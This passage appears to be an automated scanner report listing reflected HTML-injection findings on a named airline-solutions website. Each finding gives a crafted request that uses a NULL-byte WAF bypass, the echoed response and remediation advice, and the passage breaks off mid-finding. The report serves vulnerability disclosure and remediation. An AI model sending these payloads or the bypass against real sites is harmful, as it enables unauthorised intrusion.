GET /home/news_events/news?%0014294<a>0ea98cb94ed=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321531; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A3%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A4%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a>0ea98cb94ed=1">news?%0014294<a>0ea98cb94ed=1</a> ...[SNIP]...
3.117. http://www.sabreairlinesolutions.com/home/news_events/news [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/news_events/news
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0026cff"><a>7455c9888f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 26cff"><a>7455c9888f8 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/news_events/news?%0026cff"><a>7455c9888f8=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321531; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A3%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A4%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a href="/home/news_events/news?%0026cff"><a>7455c9888f8=1"> ...[SNIP]...
3.118. http://www.sabreairlinesolutions.com/home/news_events/news/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/news_events/news/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0056b62"><a>45a3e4cc837 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 56b62"><a>45a3e4cc837 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/news_events/news/?%0056b62"><a>45a3e4cc837=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a href="/home/news_events/news/?%0056b62"><a>45a3e4cc837=1"> ...[SNIP]...
3.119. http://www.sabreairlinesolutions.com/home/products_services [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/products_services
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d6be4"><a>c4f7a80bf90 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d6be4"><a>c4f7a80bf90 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/products_services?%00d6be4"><a>c4f7a80bf90=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/home/products_services?%00d6be4"><a>c4f7a80bf90=1"> ...[SNIP]...
3.120. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/downloads/images [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0051ca8"><a>bab4ffaf8c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 51ca8"><a>bab4ffaf8c9 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/products_services/airline_reservations/downloads/images?%0051ca8"><a>bab4ffaf8c9=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/downloads/images/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323079; __utmb=178985382.1.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content ...[SNIP]... <a href="/home/products_services/airline_reservations/downloads/images?%0051ca8"><a>bab4ffaf8c9=1"> ...[SNIP]...
3.121. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/downloads/images [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00aa1d2<a>e23a0079847 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aa1d2<a>e23a0079847 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/products_services/airline_reservations/downloads/images?%00aa1d2<a>e23a0079847=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/downloads/images/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323079; __utmb=178985382.1.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content ...[SNIP]... <a>e23a0079847=1">images?%00aa1d2<a>e23a0079847=1</a> ...[SNIP]...
3.122. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/downloads/images/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %006e97a"><a>667bede4c97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6e97a"><a>667bede4c97 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/products_services/airline_reservations/downloads/images/?%006e97a"><a>667bede4c97=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323079; __utmb=178985382.1.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content ...[SNIP]... <a href="/home/products_services/airline_reservations/downloads/images/?%006e97a"><a>667bede4c97=1"> ...[SNIP]...
3.123. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/downloads/images/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %0080152<a>de13aac6848 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 80152<a>de13aac6848 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/products_services/airline_reservations/downloads/images/?%0080152<a>de13aac6848=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323079; __utmb=178985382.1.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content ...[SNIP]... <a>de13aac6848=1">?%0080152<a>de13aac6848=1</a> ...[SNIP]...
3.124. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/more_customers/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f85dc"><a>dfdeaf77316 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f85dc"><a>dfdeaf77316 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/products_services/airline_reservations/more_customers/?%00f85dc"><a>dfdeaf77316=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323016; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A60%3A%22%2Fproducts_services%2Fcommercial_planning%2Fairvision_technology%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Fproduct%2Fweb_services%2F%22%3Bi%3A2%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Finteract_interface%2F%22%3Bi%3A3%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_slot_manager_iata%2F%22%3Bi%3A4%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_codeshare_manager%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content ...[SNIP]... <a href="/home/products_services/airline_reservations/more_customers/?%00f85dc"><a>dfdeaf77316=1"> ...[SNIP]...
3.125. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/more_customers/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %009bfb0<a>05937178652 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9bfb0<a>05937178652 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/products_services/airline_reservations/more_customers/?%009bfb0<a>05937178652=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323016; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A60%3A%22%2Fproducts_services%2Fcommercial_planning%2Fairvision_technology%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Fproduct%2Fweb_services%2F%22%3Bi%3A2%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Finteract_interface%2F%22%3Bi%3A3%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_slot_manager_iata%2F%22%3Bi%3A4%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_codeshare_manager%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content ...[SNIP]... <a>05937178652=1">?%009bfb0<a>05937178652=1</a> ...[SNIP]...
3.126. http://www.sabreairlinesolutions.com/home/products_services/customer_sales_service [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/products_services/customer_sales_service
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00adecf"><a>1bef3683590 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as adecf"><a>1bef3683590 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/products_services/customer_sales_service?%00adecf"><a>1bef3683590=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=970953067; __utmc=178985382; exp_last_activity=1286313086; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content ...[SNIP]... <a href="/home/products_services/airline_reservations?%00adecf"><a>1bef3683590=1"> ...[SNIP]...
3.127. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/aircentre_technology/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %001e795<a>24403cf9831 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1e795<a>24403cf9831 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/products_services/enterprise_operations/aircentre_technology/?%001e795<a>24403cf9831=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322346; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A1%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3Bi%3A2%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fecommerce%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A4%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content ...[SNIP]... <a>24403cf9831=1">?%001e795<a>24403cf9831=1</a> ...[SNIP]...
3.128. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/control_cost [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %005cbdc<a>f318e8866e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5cbdc<a>f318e8866e in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/products_services/enterprise_operations/control_cost?%005cbdc<a>f318e8866e=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/control_cost/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323070; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A43%3A%22%2Fproducts_services%2Fsabre_revenue_integrity%2F%22%3Bi%3A1%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fdownloads%2F%22%3Bi%3A2%3Bs%3A51%3A%22%2Fproducts_services%2Fcommercial_planning%2Fbuild_brand%2F%22%3Bi%3A3%3Bs%3A39%3A%22%2Fproducts_services%2Fproduct%2Ftravel_bank%2F%22%3Bi%3A4%3Bs%3A52%3A%22%2Fproducts_services%2Fproduct%2Fgds_electronic_ticketing%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content ...[SNIP]... <a>f318e8866e=1">control cost?%005cbdc<a>f318e8866e=1</a> ...[SNIP]...
3.129. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/downloads [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00149e5<a>f1657a73226 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 149e5<a>f1657a73226 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
